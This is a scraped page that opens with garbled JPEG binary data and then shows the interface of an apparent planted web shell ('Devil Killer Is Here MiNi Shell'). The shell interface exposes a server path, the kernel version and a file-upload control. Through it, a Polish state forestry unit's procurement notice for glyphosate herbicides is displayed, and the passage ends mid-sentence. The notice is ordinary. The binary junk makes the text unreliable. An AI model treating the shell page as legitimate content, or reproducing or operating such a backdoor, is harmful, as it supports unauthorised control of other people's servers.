JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230216/0009908201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa środków ochrony roślin na rok 2023 – HERBICYDY – cz. I” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe OŚRODEK TRANSPORTU LEŚNEGO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 810539479</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Szpitalna 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gorzów Wielkopolski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">otlgorzow@szczecin.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://otlgorzow.szczecin.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Towarowy transport drogowy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa środków ochrony roślin na rok 2023 – HERBICYDY – cz. I” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ec426317-ac53-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00099082</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/otlgorzow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy SmartPZP - https://portal.smartpzp.pl/otlgorzow (dalej – „Platforma”). Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje w komunikacji między Zamawiającym a poszczególnymi Wykonawcami przekazywane są w zakładce „Korespondencja” . Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje w komunikacji między Zamawiającym a ogółem Wykonawców przekazywane są w zakładce „Dokumentacja Postępowania”.<br/>W celu skorzystania z Platformy konieczna jest rejestracja Wykonawcy pod adresem: https://portal.smartpzp.pl/otlgorzow po kliknięciu na przycisk „Załóż konto”. Więcej informacji zawiera SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Minimalne wymagania techniczne dotyczące korzystania z Platformy:<br/>1)	przesyłane dokumenty powinny być załączone w formie plików w formacie odpowiednio . png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar, .7zip, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg,<br/>2)	wymagania sprzętowe dla Wykonawcy:<br/>a)	przeglądarka internetowa Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11,<br/>b)	lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest używanie najnowszych wersji przeglądarek, <br/>c)	system operacyjny Windows 7 i późniejsze,<br/>d)	zainstalowane środowisko Java w wersji min. 1.8 (jre),<br/>e)	w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki Szafir SDK Web,<br/>f)	oprogramowanie SzafirHost w systemie operacyjnym, <br/>g)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 1 Mb/s,<br/>h)	komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - lub ich nowsze wersje, <br/>i)	zainstalowany program Acrobat Reader lub inny umożliwiający obsługę formatów .pdf.<br/>Pozostałe wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z Platformy. <br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty oraz do komunikacji wynosi 100 MB. Za pośrednictwem Systemu można przesłać wiele pojedynczych plików lub plik skompresowany do archiwum (ZIP) zawierający wiele pojedynczych plików. Zgodnie z SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i ust. 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r.) – „RODO”, Zamawiający informuje, że administratorem danych osobowych jest Dyrektor Ośrodka Transportu Leśnego z siedzibą przy ul. Szpitalnej 2, 66 – 400 Gorzów Wielkopolski, tel. +48 95 732 37 88, e-mail: oltgorzow@szczecin.lasy.gov.pl.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZM.270.8.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: dostawa środków ochrony roślin na rok 2023 – HERBICYDÓW, na którą składają się:<br/><br/>1)	HERBICYD nieselektywny o działaniu układowym, stosowany nalistnie, w formie granul do rozcieńczania wodą. Zgodnie z klasyfikacją HRAC substancja czynna glifosat zaliczana jest do grupy G. Środek przeznaczony do stosowania przez użytkowników profesjonalnych. Zawartość substancji czynnej: glifosat (związek z grupy aminofosfonianów) w formie soli amonowej – 720 g/kg (72%). Środek przeznaczony do stosowania przy użyciu samobieżnych lub ciągnikowych opryskiwaczy polowych i ręcznych (w tym plecakowych) oraz mazacza ręcznego i polowego. <br/>Środek powinien być zawarty w Wykazie Instytutu Badawczego Leśnictwa Środków Ochrony Roślin zalecanych do stosowania w leśnictwie w roku 2023 przeznaczony do zwalczania chwastów w szkółkach leśnych – kwatery z siewkami i wielolatkami drzew iglastych i liściastych oraz zwalczania chwastów w uprawach leśnych – wielolatki różnych gatunków. Okres przydatności do użycia co najmniej 18 miesięcy od daty dostawy.<br/>Ilość: 220 litrów w opakowaniach 10 litrowych.<br/><br/>2)	HERBICYD nieselektywny o działaniu układowym, stosowany nalistnie, w formie koncentratu do sporządzania roztworu wodnego (SL). Zgodnie z klasyfikacją HRAC substancja czynna glifosat zaliczana jest do grupy G. Środek ochrony roślin do stosowania przez użytkowników profesjonalnych i nieprofesjonalnych, o działaniu chwastobójczym w formie koncentratu do sporządzania roztworu wodnego, przeznaczony do zwalczania perzu oraz innych chwastów jednoliściennych i dwuliściennych (jednorocznych i wieloletnich). Produkt zawiera glifosat <br/>w formie soli izopropyloaminowej (substancja z grupy pochodnych kwasu fosfonowego) – 360 g/l (30,9 %). <br/>Środek powinien być zawarty w Wykazie Instytutu Badawczego Leśnictwa Środków Ochrony Roślin zalecanych do stosowania w leśnictwie w roku 2023 przeznaczony do zwalczania chwastów w szkółkach leśnych – kwatery z siewkami i wielolatkami drzew iglastych i liściastych oraz zwalczania chwastów w uprawach leśnych – wielolatki różnych gatunków. Okres przydatności do użycia co najmniej 18 miesięcy od daty dostawy.<br/>Ilość: 1550 litrów w opakowaniach 5 litrowych oraz 1540 litrów w opakowaniach 20 litrowych.<br/><br/>3)	HERBICYD nieselektywny o działaniu układowym, stosowany nalistnie, w formie koncentratu do sporządzania roztworu wodnego (SL). Zgodnie z klasyfikacją HRAC substancja czynna glifosat zaliczana jest do grupy G. Środek przeznaczony do stosowania przez użytkowników profesjonalnych. Zawartość substancji czynnej: glifosat (związek z grupy aminofosfonianów) w formie soli izopropyloamoniowej - 360 g/l (30,56 %). Środek przeznaczony do stosowania przy użyciu samobieżnych lub ciągnikowych opryskiwaczy polowych i opryskiwaczy ręcznych oraz za pomocą mazaczy. <br/>Środek powinien być zawarty w Wykazie Instytutu Badawczego Leśnictwa Środków Ochrony Roślin zalecanych do stosowania w leśnictwie w roku 2023 przeznaczony do zwalczania chwastów przy przygotowaniu gleby pod szkółki oraz zwalczania chwastów przed założeniem uprawy. <br/>Okres przydatności do użycia co najmniej 18 miesięcy od daty dostawy.<br/>Ilość: 1205 litrów w opakowaniach 5 litrowych oraz 3500 litrów w opakowaniach 20 litrowych.<br/><br/>4)	HERBICYD nieselektywny o działaniu układowym, stosowany nalistnie, w formie koncentratu do sporządzania roztworu wodnego (SL). Zgodnie z klasyfikacją HRAC substancja czynna glifosat zaliczana jest do grupy 9 (dawniej grupy G). Środek przeznaczony do stosowania przez użytkowników profesjonalnych. Zawartość substancji czynnej: glifosat (związek z grupy aminofosfonianów) w formie soli izopropyloaminowej (400,8 g/l) oraz w formie soli potasowej (297,7 g/l) - 540 g/l (41,49 %). Środek przeznaczony do stosowania przy użyciu samobieżnych lub ciągnikowych opryskiwaczy polowych i opryskiwaczy ręcznych (w tym plecakowych) oraz za pomocą mazaczy.<br/>Środek powinien być zawarty w Wykazie Instytutu Badawczego Leśnictwa Środków Ochrony Roślin zalecanych do stosowania w leśnictwie w roku 2023 przeznaczony do zwalczania chwastów przy przygotowaniu gleby pod szkółki oraz zwalczania chwastów przed założeniem uprawy. <br/>Okres przydatności do użycia co najmniej 18 miesięcy od daty dostawy.<br/>Ilość: 570 litrów w opakowaniach 5 litrowych oraz 570 litrów w opakowaniach 20 litrowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">24453000-4 - Środki chwastobójcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób obliczania punktów dla poszczególnych kryteriów:<br/><br/>1) Kryterium „Cena z podatkiem VAT” – 60 pkt<br/><br/>W ramach kryterium „Cena z podatkiem VAT” ocena ofert zostanie dokonana przy zastosowaniu wzoru: <br/>C = (Cmin / Cof) x 60 [pkt]<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena z podatkiem VAT”,<br/>Cmin – najniższa cena [zł] z podatkiem VAT spośród wszystkich ofert podlegających ocenie, <br/>Cof – cena [zł] z podatkiem VAT podana przez Wykonawcę, dla którego wynik jest obliczany.<br/>Ocenie w ramach przedmiotowego kryterium podlegać będzie cena łączna brutto podana w formularzu Oferty (Załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 w zw. z art. 266 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej <br/>w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/><br/>2) Kryterium „Termin realizacji poszczególnych dostaw” – 40 pkt<br/><br/>W ramach kryterium „Termin realizacji poszczególnych dostaw” ocenie ofert będzie podlegać termin realizacji poszczególnych dostaw zadeklarowany przez Wykonawcę w formularzu Oferty (Załącznik nr 1 do SWZ). Ocena ofert nastąpi według następujących zasad:<br/>a)	Termin realizacji poszczególnych dostaw do 5 dni roboczych – 40 pkt,<br/>b)	Termin realizacji poszczególnych dostaw od 6 do 7 dni roboczych – 20 pkt,<br/>c)	Termin realizacji poszczególnych dostaw od 8 do 10 dni roboczych – 0 pkt.<br/>Maksymalny termin realizacji poszczególnych dostaw, jaki może zaoferować Wykonawca, wynosi 10 dni roboczych. Oferta Wykonawcy, który zaoferuje termin realizacji poszczególnych dostaw dłuższy niż 10 dni roboczych, zostanie odrzucona jako niezgodna z warunkami zamówienia.<br/><br/>Za najkorzystniejszą ofertę zostanie uznana oferta Wykonawcy, która uzyska największą łączną liczbę punktów. Maksymalna liczba punktów, jaką może uzyskać oferta: 100 pkt.<br/>Łączna liczba punktów przyznana każdej z ocenianych ofert obliczona zostanie wg poniższego wzoru:<br/>L = C + T [pkt]<br/>gdzie:<br/>L – łączna liczba punktów przyznanych ofercie,<br/>C – liczba punktów w ramach kryterium „Cena z podatkiem VAT”, <br/>T – liczba punktów w ramach kryterium „Termin realizacji poszczególnych dostaw”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji poszczególnych dostaw</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym Zamawiający nie określa szczególnych wymagań w zakresie spełnienia przedmiotowego warunku udziału w postępowaniu. <br/><br/>2)	uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów<br/><br/>Zgodnie z art. 25 ust. 1 ustawy z dnia 8 marca 2013 r. o środkach ochrony roślin (t.j. Dz. U. z 2020 r. poz. 2097 ze zm.) działalność gospodarcza w zakresie wprowadzania środków ochrony roślin do obrotu lub konfekcjonowania tych środków jest działalnością regulowaną w rozumieniu przepisów ustawy z dnia 6 marca 2018 r. Prawo przedsiębiorców (t.j. Dz. U. <br/>z 2021 r. poz. 162 ze zm.) i wymaga wpisu do rejestru przedsiębiorców wykonujących działalność w zakresie wprowadzania środków ochrony roślin do obrotu lub konfekcjonowania tych środków.<br/><br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca posiada aktualny wpis do rejestru przedsiębiorców wykonujących działalność w zakresie wprowadzania środków ochrony roślin do obrotu lub konfekcjonowania tych środków, zgodnie z ustawą z dnia 8 marca 2013 r. o środkach ochrony roślin.<br/><br/>Zamawiający dokona oceny ww. warunku na podstawie wpisu do rejestru udostępnionego na stronie Państwowej Inspekcji Ochrony Roślin i Nasiennictwa www.piorin.gov.pl.<br/><br/>3)	sytuacji finansowej lub ekonomicznej<br/>Zamawiający nie określa szczególnych wymagań w zakresie spełnienia przedmiotowego warunku udziału w postępowaniu.<br/> <br/>4)	zdolności technicznej lub zawodowej<br/>Zamawiający nie określa szczególnych wymagań w zakresie spełnienia przedmiotowego warunku udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga złożenia przez Wykonawcę wraz z ofertą przedmiotowych środków dowodowych w postaci kart charakterystyki środków oraz etykiet (instrukcji stosowania) opisujących oferowane przez Wykonawcę produkty, o których mowa w pkt 3.1. SWZ. Przedmiotowe środki dowodowe mają na celu potwierdzenie, że oferowane przez Wykonawcę produkty spełniają wymagania określone przez Zamawiającego w opisie przedmiotu zamówienia w pkt 3.1. i pkt 3.2. SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> karty charakterystyki środków oraz etykiety (instrukcje stosowania) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum): <br/>1)	w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>2)	oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3)	oświadczenie, o którym mowa w art. 125 ust. 1 PZP, tj. oświadczenie o braku podstaw do wykluczenia i o spełnieniu warunków udziału w postępowaniu (wg wzoru stanowiącego Załącznik nr 3 do SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>Ww. oświadczenia Wykonawców wspólnie ubiegających się o udzielenie zamówienia powinny zostać złożone wraz z ofertą - pod rygorem nieważności - w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/>4)	wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy;<br/>5)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>6)	Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna;<br/>7)	zgodnie z art. 117 ust. 2 PZP warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w pkt 8.2. ppkt 2 SWZ jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie 